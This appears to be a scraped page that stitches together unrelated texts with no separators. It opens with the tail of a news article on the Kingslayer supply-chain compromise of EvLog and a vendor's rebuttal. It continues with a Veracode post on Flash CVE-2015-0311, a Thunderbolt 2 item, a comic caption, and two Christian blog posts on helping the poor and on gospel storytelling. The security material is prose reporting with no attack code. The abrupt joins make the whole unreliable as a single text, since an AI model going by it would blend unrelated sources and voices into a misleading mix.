The fact that those software titles appear to have been sold and downloadable from the same server as eventid.net (going back as far as 2010) suggests that those products may have been similarly compromised. However, I could find no breach notification mentioning those products. Here is a list of companies that Altair says are customers of Firegen; they include 3M, DirecTV, Dole Food Company, EDS, FedEx, Ingram Micro, Northrop Grumman, Symantec and the U.S. Marshals Service.

RSA calls these types of intrusions “supply chain attacks,” in that they provide one compromise vector to multiple targets. It’s not difficult to see from the customer lists of the software titles mentioned above why an attacker might salivate over the idea of hacking an entire suite of software designed for corporate system administrators.

“Supply chain exploitation attacks, by their very nature, are stealthy and have the potential to provide the attacker access to their targets for a much longer period than malware delivered by other common means, by evading traditional network analysis and detection tools,” wrote RSA’s Kent Backman and Kevin Stear. “Software supply chain attacks offer considerable ‘bang for the buck’ against otherwise hardened targets. In the case of Kingslayer, this especially rings true because the specific system-administrator-related systems most likely to be infected offer the ideal beachhead and operational staging environment for system exploitation of a large enterprise.”

A copy of the RSA report is available here (PDF).

Update, 3:35 p.m. ET: I first contacted Altair Technologies’ Grigorof on Feb. 9. I heard back from him today, post-publication. Here is his statement:

“Rest assured that the EvLog incident has been reviewed by a high-level security research company and the relevant information circulated to the interested parties, including antivirus companies. We are under an NDA regarding their internal research though the attack has already been categorized as a supply chain attack.”

“The notification that you’ve seen was based on their recommendations and they had our full cooperation on tracking down the perpetrators. It’s obviously not as spectacular as a high visibility, major company breach and surely there wasn’t anything in the news – we are not that famous.”

“I’m sure a DDoS against our site would remain unnoticed while the attack against your blog site made headlines all over the world. We also don’t expect that a large organization would use EvLog to monitor their servers – it is a very simple tool. We identified the problem within a couple of weeks (vs months or years that it takes for a typical breach) and imposed several layers of extra security in order prevent this type of problem.”

“To answer your direct question about notifications, we don’t keep track on who downloads and tries this software, therefore there is no master list of users to notify. Any anonymous user can download it and install it. I’m not sure what you mean by ‘you still haven’t disclosed this breach’ – it is obviously disclosed and the notification is on our website. The notification is quite explicit in my opinion – the user is warned that even if EvLog is removed, there may still be other malware that used EvLog as a bridgehead.”

My take on this statement? I find it to be wholly incongruent. Altair Technologies obviously went to great lengths to publish who its major customers were on the same sites it was using to the sell the software in question. Now the owner says he has no idea who uses the software. That he would say it was never intended to be used in major organizations seems odd in contrast.

Finally, publishing a statement somewhere in the thick of your site and not calling attention to it on any other portion of your site isn’t exactly a disclosure. If nobody knows that there’s a breach notice there to find, how should they be expected to find it? Answer: They’re not, because it wasn’t intended for that purpose. This statement hasn’t convinced me to the contrary.

Update, 11:13 p.m. ET: Altair Technologies now has a link to the breach notification on the homepage for Evlog: http://www.eventid.net/evlog/

Piled Higher & Deeper by Jorge Cham		www.phdcomics.com
title: "Sharing" - originally published 9/4/2015 For the latest news in PHD Comics, CLICK HERE!

Read 5 remaining paragraphs | Comments

Adobe has issued emergency patches to address a critical vulnerability in Flash Player versions 16.0.0.287 and earlier for Windows and Macintosh systems. The vulnerability, CVE-2015-0311, has been exploited in the wild, via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below. The vulnerability can potentially allow attackers to take control of an affected system.

The best course of action to mitigate the risk introduced by this vulnerability is to patch the application as soon as possible. We also recommend turning on the "right-click to run" feature for browser plugins. This will help protect against the drive-by-download attacks that have been seen in the wild. As Veracode's Chris Wysopal has put it, "who wants auto-running Flash content anyway?"

This vulnerability was disclosed back in January – almost six months ago. It is alarming that the patch for such a critical vulnerability is only available now. Adobe claims that more than 500 million devices are addressable with Flash technology. With so many devices using Flash, the reach of this vulnerability is staggering.

Branding vulnerabilities is in vogue, yet this vulnerability seems to have escaped that trend. We can be thankful we won't have to look at some sort of lightning bolt logo for the next several weeks. Yet, despite the fact the vulnerability was not branded, this presents an opportunity for security professionals to reassess their ideas about the security of third-party software.

As companies adapt to the digital economy, in which every company is a technology company, enterprises are purchasing an ever-increasing inventory of software in order to keep up with the pace of innovation. When one of these purchased applications has a critical vulnerability, it ends up impacting hundreds or even thousands of companies. Hackers know this, and so they are more likely to create exploits for vulnerabilities in widely used commercial software than a vulnerability in an enterprise-specific application. Basically, they get access to more systems for the same amount of effort.

This is why it is crucial that enterprises stop ignoring the elephant in the room that is vulnerabilities in the software supply chain. Wendy Nather, research analyst for 451 Group, spoke to several CISOs about how they address the security of the software they are buying. Turns out the approaches are as varied as the companies' business models.

Zero-day vulnerabilities will always exist. But our data shows that even enterprises with mature application security programs, which spend millions on security each year, can neglect assessing third-party software for security. This has led to some serious breaches, the most talked about may be the JPMC breach in late 2014. If a company that spends so much time, effort and money securing its internally developed applications can still be breached through the application-layer, any company can. That's why companies need to hold their software vendors to the same security standards to which they hold their own development teams. If enterprises are successfully able to push back on their vendors in this way, we will see a reduction in zero-day vulnerability disclosures because more vendors will be pushed to integrate secure development programs at their companies.

Author: Jessica Lavery

Soundy is the new sound.

Presents the table of contents for this issue of this magazine.

Earlier this year Intel revealed some details about Falcon Ridge, its 2014 Thunderbolt controller. Today it went a little further and gave the updated Thunderbolt spec a new name: Thunderbolt 2.

New details are scarce unfortunately. Thunderbolt 2 moves to a new 20Gbps bi-directional channel that can handle both data and/or display. Current implementations are limited to 10Gbps per channel for data or display, both can't be sent over the same channel.

Thunderbolt 2 will support DisplayPort 1.2 and 4K video. Intel expects the first Thunderbolt 2 controllers to go into production by the end of this year, and ramp into early 2014. Given the timeframe I no longer believe this is a Broadwell play. It also seems too early for the rumored 9-series chipset refresh. Thunderbolt 2 may end up appearing out of phase with both of those. 

At first blush, this question might seem like a no-brainer to readers. But, who are the poor? What does God’s Word say about the poor? How do we effectively help the poor? Let’s dig in!

Who are the poor?

Because all of us come from different backgrounds, cultures, and expectations, what we define as poor, may not actually be poor to others or even in God’s eyes. Determining who the poor really are can become a very subjective exercise. To prevent that we must first establish a common understanding of whom the poor are as presented in the Scriptures.

The two primary Greek words used in the New Testament for the word poor are penichros and ptōchos. Penichros is defined as needy while ptōchos has more severe implications meaning reduced to beggary, destitute of wealth, influence, position, honor, lowly, afflicted, helpless, powerless to accomplish an end, lacking in anything.

John MacArthur writes, “The word commonly used for ordinary poverty was penichros, and is used of the widow Jesus saw giving an offering in the Temple. She had very little, but she did have two small copper coins (see Luke 21:2). She was poor but not a beggar. One who is penichros poor has at least some meager resources. One who is ptōchos poor, however, is completely dependent on others for sustenance. He has absolutely no means of self-support.”

For the purpose of this article, I’ve chosen to focus on the ptōchos poor, those that are helpless and lack everything.

Two Kinds of Poverty

The New Testament describes two kinds of ptōchos poverty:

1.  Materially Poor – But when you give to the needy, do not let your left hand know what your right hand is doing, . . . . (Matthew 6:3 NIV).

This verse clearly points out the existence of the materially poor. This is not a command to give from Jesus but a description of how we are to give (quietly). This verse primarily strikes at our motive for giving to the poor as it comes in the context of a warning from Jesus to not practice acts of righteousness so that others will notice.

2.  Spiritually Poor – Blessed are the poor in spirit, for theirs is the kingdom of heaven. (Matthew 5:3 NIV)

This verse speaks of those who are spiritually poor and how they are blessed because of their poverty.  Matthew Henry’s concise commentary shares this insight, “The poor in spirit are happy. These bring their minds to their condition, when it is a low condition. They are humble and lowly in their own eyes. They see their want, bewail their guilt, and thirst after a Redeemer. The kingdom of grace is of such; the kingdom of glory is for them.”

Obviously, no one desires material poverty, but this verse makes it clear that all of us should desire a spiritual poverty that recognizes the need for forgiveness, a savior and God’s continued presence in our lives.

To keep this article focused and brief, we will focus on the materially poor.

What the Scriptures Reveal about God and Poverty

There are many Scriptures that address the God’s heart for and perspective of the poor but I have selected just a few to help us draw a conclusion to the subject question:

1. Giving and helping the poor is core to God’s character: As it is written: “They have freely scattered their gifts to the poor; their righteousness endures forever.” (2 Corinthians 9:9 NIV) Also, 1 Samuel 2:8 NIV shares, “He raises the poor from the dust and lifts the needy from the ash heap; he seats them with princes
   and has them inherit a throne of honor. “For the foundations of the earth are the Lord’s; on them he has set the world.”
2. Jesus assumes we will be giving to the poor (notice not “if” but “when”): “So when you give to the needy, do not announce it with trumpets, as the hypocrites do in the synagogues and on the streets, to be honored by others. Truly I tell you, they have received their reward in full.” (Matthew 6:2 NIV)
3. True followers of Christ gave to the poor: “But Zacchaeus stood up and said to the Lord, “Look, Lord! Here and now I give half of my possessions to the poor, and if I have cheated anybody out of anything, I will pay back four times the amount.” (Luke 19:8 NIV) Paul was eager to give as well: “All they asked was that we should continue to remember the poor, the very thing I had been eager to do all along.” (Galatians 2:10 NIV)
4. When we give to the poor, we are giving to God: “Whoever is kind to the poor lends to the Lord, and he will reward them for what they have done.” (Proverbs 19:17 NIV)
   
5. When we give to the poor, it honors God: ”Whoever oppresses the poor shows contempt for their Maker,
   but whoever is kind to the needy honors God.” (Proverbs 14:31 NIV)
6. The Israelites were commanded to provide for the poor and were blessed for their generosity:  “At the end of every three years, bring all the tithes of that year’s produce and store it in your towns, so that the Levites (who have no allotment or inheritance of their own) and the foreigners, the fatherless and the widows who live in your towns may come and eat and be satisfied, and so that the Lord your God may bless you in all the work of your hands.” (Deuteronomy 14:28-29 NIV)
7. Not helping the poor was reason for judgment in the past: “ ‘Now this was the sin of your sister Sodom: She and her daughters were arrogant, overfed and unconcerned; they did not help the poor and needy.” (Ezekiel 16:49 NIV)
8. It will be a topic at the future judgment: “Then the King will say to those on his right, ‘Come, you who are blessed by my Father; take your inheritance, the kingdom prepared for you since the creation of the world. For I was hungry and you gave me something to eat, I was thirsty and you gave me something to drink, I was a stranger and you invited me in, I needed clothes and you clothed me, I was sick and you looked after me, I was in prison and you came to visit me.’
   “Then the righteous will answer him, ‘Lord, when did we see you hungry and feed you, or thirsty and give you something to drink? When did we see you a stranger and invite you in, or needing clothes and clothe you?When did we see you sick or in prison and go to visit you?’
   “The King will reply, ‘Truly I tell you, whatever you did for one of the least of these brothers and sisters of mine, you did for me.’
   “Then he will say to those on his left, ‘Depart from me, you who are cursed, into the eternal fire prepared for the devil and his angels. For I was hungry and you gave me nothing to eat, I was thirsty and you gave me nothing to drink, I was a stranger and you did not invite me in, I needed clothes and you did not clothe me, I was sick and in prison and you did not look after me.’
   “They also will answer, ‘Lord, when did we see you hungry or thirsty or a stranger or needing clothes or sick or in prison, and did not help you?’
   “He will reply, ‘Truly I tell you, whatever you did not do for one of the least of these, you did not do for me.’
   “Then they will go away to eternal punishment, but the righteous to eternal life.” (Matthew 25:34-46 NIV)

Specific Commands from Jesus and His Word

Here are three specific commands from Jesus and His Word. One to the rich young ruler wondering what his life lacked and the others to more general audiences of followers:

• “All these I have kept,” the young man said. “What do I still lack?” Jesus answered, “If you want to be perfect, go, sell your possessions and give to the poor, and you will have treasure in heaven. Then come, follow me.” When the young man heard this, he went away sad, because he had great wealth. (Matthew 19:20-22 NIV)
• Then Jesus said to his host, “When you give a luncheon or dinner, do not invite your friends, your brothers or sisters, your relatives, or your rich neighbors; if you do, they may invite you back and so you will be repaid. But when you give a banquet, invite the poor, the crippled, the lame, the blind, and you will be blessed. Although they cannot repay you, you will be repaid at the resurrection of the righteous.” (Luke 14:12-14 NIV)
• If anyone has material possessions and sees a brother or sister in need but has no pity on them, how can the love of God be in that person? Dear children, let us not love with words or speech but with actions and in truth. (1 John 3:17-18 NIV)

While the first is a specific command to an individual, the principles apply to all of Christ’s followers, which is that we must give generously to the poor, and that when we do, it’s an eternal investment. Luke 14:12-14 clearly shares Jesus’ heart toward the poor and needy and is a specific command to His followers to be intentional about reaching out and providing for them. The passage in 1 John is a clear warning to those who say they are Christ’s followers but the actions don’t align with their proclaimed faith. In this verse, we are compelled to provide for those in need.

How can we help the materially poor?

After just a brief review of Scripture it becomes very clear that we are commanded to help the poor. God demonstrates His heart for the poor and needy by His own example, through His promises for those who do, and through His perfect judgments for those who don’t. But how does one give to the poor effectively? Here are four suggestions:

1. Give strategically through a trusted ministry or foundation.

You can effectively give your time and talents to the poor by supporting a local rescue mission or community organization that is trusted and has a proven track record helping the poor and needy. Knowing how to choose the best charities is important. If your church has a direct ministry to the poor and needy, this is a great starting place!

2. Give strategically by giving more than money.

Effective long-term support of the poor and needy typically requires more than money. For the poor and needy who are mentally and physically able to recover, I encourage readers to plug in with respected and trusted ministries and community organizations to give by sharing practical skills, such as job/vocational skills, budgeting, and basic life skills that will effectively empower those in need for long-term recovery.

3. Give spontaneously and cheerfully.

I’m often asked, “Should I give to the beggar on the street corner?” Many are rightfully skeptical due to recent scandals of pan handlers who are not truly in need. My advice is to listen to the Holy Spirit. If you sense a burden or call to give, then give cheerfully and obediently. If you don’t, then don’t give. If your motive is pure, you will never regret a decision to give. Now this advice can only be successful if you are asking God and listening to Him.

4. Get equipped.

I recommend two books that will equip you with how to effectively help the poor. The first is When Helping Hurts: How to Alleviate Poverty Without Hurting the Poor . . . and Yourself by Steve Corbett and Brian Fikkert. A second resource is titled, Giving Wisely by Jonathan Martin.

How about you? Have you found an effective way to help the poor that would equip other readers? Share any lessons you learned as well!

What do you do when you get together with friends? You start with story. What do you do when you return from vacation? Do you pull out the agenda from the cruise and walk them through a list of what you did? No, you share story. How do you explain your childhood to your kids? Story.

It is almost impossible to separate storytelling from the fabric of relationship. We like to tell stories and hear stories. Sharing them is the foundation of relationship. And yet, we often fail to share the story of the scriptures in the same natural way. If story is the way we share  how our day went, why is it not the form in which we clarify the gospel? If story is the way we instruct our children in the way they should live, why don’t we become storytellers to instruct disciples in the way of obedience. We like stories as illustrations in sermons to clarify meaning but fail to see the story of Scripture as the place to find meaning. I want to call us back to narrative. I invite us to become gospel storytellers. The Bible is nearly two-thirds narrative. It is the story of God. We ought to share it.

Stories are Where We Go for Meaning

“What is the meaning of life?” is the timeless question. It is the question asked in Micah 6:8: “What is required of man?” It is Aristotle’s question: “How should a man lead his life?” Historically, humanity has answered this question through philosophy, science, religion, and art. The first three have failed us or been disregarded. No one reads Plato outside of homework and cramming for exams. We are tired of science’s polished but empty answers. Religion is a place of hypocrisy, ritual, and superstition. The world of cynics has rejected all but the art and story is the dominant art form:

The world now consumes films, novels, theatre, and television in such quantities and such ravenous hunger that the story arts have become humanity’s prime source for inspiration. Robert McKee, Story.

Many of the stories we hear and tell fall short of the meaning of life. As a society, we are beyond the myth of progressive human progress. We have far too many evils to remind us we aren’t getting better. The depravity of the world is our base assumption and our human hunch is that life was not supposed to be this way. Stories try to explain the way forward through this mess. However, void of the gospel story, our neighbors hears some variation of this plot: you can fix your problems, if we are creative, courageous, and smart enough. The meaning of life in contemporary stories is: you are the center of the problem and the solution. The story, or life, is about you. However, the gospel is the story of God for you, for your life. The story of a gracious and just God who goes to great lengths to save and redeem those who don’t deserve it. The story of God gives humanity a new identity, meaning, and purpose.

Stories are Where We Turn for Guidance

Kenneth Burke said, “Stories are equipment for living.” We model our own life choices on the stories we believe are best or the stories we wish to avoid. We hear how things worked and didn’t work in the years before and make adjustments. We learn from how our older siblings stories and model our own lives after them. Not only do my parents and teachers have major impact on forming the way I wanted to live, but so did Huck Finn, Bill Huxtable, the Box Car Children, and the group from Saved by the Bell. These stories and characters instructed and formed my proper view of living. They taught me how to live adventurously, with integrity, and even how to ask a girl out on a date. They do so, because we connect with the characters. We witness what they witness, we experience what they do. Stories are shaped in the reality of the world. They reflect what is true of us and our surroundings. As we listen to a story, it informs how we live. How does the story of the Bible inform how you live? What would it look like to have life shaped by the gospel story and bring others into that story?

Stories are the Glue of Community

Stories form and hold groups of people together. They are the folklore shared, the background , and the history of our greatest triumphs over our most challenging days. The inside jokes, the shared experiences turned lifelong memories, and anything that follows “remember that one time” binds communities together. The stories a community shares are the stories that define it. If the story is one of independence and self-reliance, the community will be shaped by this. If the common story is one of pleasure and riches, it will be defined by this, too. If the community’s story is one of hope, grace, and love, it will be characterized by hope, grace, and love.

The Good Story

Robert McKee, the self proclaimed story guru of the 21st century, writes that “a good story tells the world something it wants to hear and it’s the artists job to figure out what it wants to hear.” The gospel is that good story. It is the story of what the world needed but didn’t deserve being given by God through Christ. It is the story of true acceptance, adoption, belonging, gifts, overcoming the destruction and devastation of this world. Eugene Peterson explains this well:

Stories are the most prominent biblical way of helping us see ourselves in ‘the God story,’ which always gets around to the story of God making and saving us. Stories, in contrast to abstract statements of truth, tease us into becoming participants in what is being said. We find ourselves involved in the action. We may start as spectators or critics, but if the story is good (and the biblical stories are very good!), we find ourselves no longer just listening to but inhabiting the story.

The gospel is a story not a list of facts. It is the story about God redeeming, rescuing, and recreating his creation. The story of God taking it upon himself to save us from death and bring us to life. The gospel is the true story and only trustworthy account for what has been done to redeem the world. The story is good news. The gospel is the compelling story that doesn’t fall flat on meaning. The story that satisfies our longings for purpose and joy. It is the greatest story because it instructs us in how to live with faith and in close relationship with God. Furthermore, it creates a community. The story of God makes a new people characterized by grace, because the story is about grace. The community is centered around God because the story is about God. This is a story the world wants and needs to hear.

Sheryl’s Story

Her family tree mostly produced problems. Its fruit wasn’t peppered with convicts or crazies, just disappointments: neglected homes, broken promises, and abandoned children. The residue of family pain was silent relationships. She knew at an early age that everything would be uphill for her and no one was going to carry her. Whatever she gained would be by her sweat. Whatever the costs, she would pay. She was raised religiously in what to do and how to do it. She knew the right things to do but was never told the story.

One evening, she came to our home for our community’s weekly meal and story time. We shared and engaged the story of the early church (Acts 2). We shared the story of God’s adoption of us and the creation of the church. It was story-time. In the middle, Sheryl asked, “I’ve never heard this story, but is the church a family? All I’ve heard is God wants us to do stuff for him and live right, this story sounds like God loves us like children.” My wife explained, “Church is family. We are a family. Even when we are not together we are the family. But all good families get together, catch up, share stories, and live life together.”

Sheryl was raised to know the right things to do and the bullet points of theology. She was never told the story of the Gospel. The story she had believed was one of self-reliance and moral behavior. She found meaning in it and had accepted this story for her life. But it wasn’t the true story. We had the blessing of sharing the story of God with her. Unfortunately, most of the people we live around and work with don’t know the gospel story, either. They may know some of the points, or some of the characters, but they haven’t heard the story. Like Sheryl, they need to hear it and engage. Be a storyteller to them!

Become a Storyteller

How do you become a gospel storyteller?

• Begin by knowing it as a story. Read it, listen to it, and engage it in conversation with us. Place yourself in the narrative, not as the hero but as the everyman. 
• Ask of the story? If this were true, how would it change my life, community, city?
• Participate in the Story-Formed Way created by Soma Communities.
• Speak it. The best way to learn is to share it and try!
• Share your life story and how it is really part of God’s story.

–

Brad Watson serves as a pastor of Bread&Wine Communities in Portland, Oregon. He is also the director of GospelCenteredDiscipleship.com. Brad is the co-author of Raised? Doubting the Resurrection. His greatest passion is to encourage and equip leaders for the mission of making disciples. He is Mirela’s husband and Norah’s dad. Twitter: @BradsStories

–

Read more on story-formed discipleship: A Story of Gospel Community by Seth Mcbee.

The post Be a Storyteller appeared first on Gospel Centered Discipleship | Resources to Make, Mature, & Multiply disciples of Jesus.